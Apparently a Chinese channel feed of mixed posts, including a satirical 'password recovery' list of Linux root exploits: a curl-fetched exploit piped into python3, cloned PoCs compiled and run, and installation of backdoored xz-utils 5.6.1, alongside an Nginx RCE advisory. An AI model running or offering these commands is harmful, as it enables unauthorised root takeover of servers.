制式仪刀: jandan.net/t/6145541
OO: 171 XX: 8
af1aa: 周五周五,敲锣打鼓!
OO: 18, XX: 0
Vic: 张力。
OO: 12, XX: 0
exeno: 乔斯达·乔喵瑟
OO: 7, XX: 0
https://www.youtube.com/watch?v=hpY9YWuG9UI
Louis 这是跟竹子肛起来了?
不少玩家都会把游戏里一些重复度高、却又不得不完成的任务戏称为“打工”。一旦某款游戏(尤其是GaaS游戏)里“打工”的成分太高,往往会引来批评。只不过,这种批评针对的大多是“被迫打工”,如果放在一些摆明了要玩家主动干活的游戏里,情况很可能完全不同。 https://www.chuapp.com/article/291356.html
Читать полностью…
1. Linux 找回密码教程,建议收藏!
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
Setting up a free *.city.state.us locality domain https://fredchan.org/blog/locality-domains-guide/
Читать полностью…
https://ebird.org/species/orimag1
我当年在北师大门口看到激情 3P 的就是这鸟 ˊ_>ˋ
Q_Z: jandan.net/t/6145530
OO: 157 XX: 3
Tinker: 让AI控制服务器,和让机器人抓住蛋蛋帮你按摩没什么两样,看起来是效率增加,一出问题就完蛋。
OO: 64, XX: 1
Raffaele: 运维是T800
OO: 14, XX: 0
你为啥直接用AI重写啊?RiiR 里不是这样的!你应该先好好学习Rust,然后硬啃旧代码仔细重新梳理架构,重新组织成对Rust友好的结构,然后和borrowchecker大战三百回合,最后在某个写了几个月大巨大PR中CI全绿,请求review,贡献者仔细审查同意合并,然后才变成Rust项目,你怎么上来直接Agent啊?RiiR根本不是这样的,我不接受!
Nginx 被发现一个存在18年的内存损坏漏洞,可导致远程代码执行,利用门槛低
漏洞存在于每个通用发行版都会包含的rewrite模块 ngx_http_rewrite_module ,影响开原版本Nginx 0.6.27至最近的1.30.0版本,在计算目标缓冲区大小时,使用的是原始字节长度,但在实际写入时,却进行了 URL 转义( + , % , & 等字符会扩展为 3 倍长度),溢出长度可控导致堆喷射
建议用户尽快更新至 1.30.1 / 1.31.0 版本
Ref: https://depthfirst.com/nginx-rift
https://vxtwitter.com/NathieVR/status/2054308935956320433
Читать полностью…
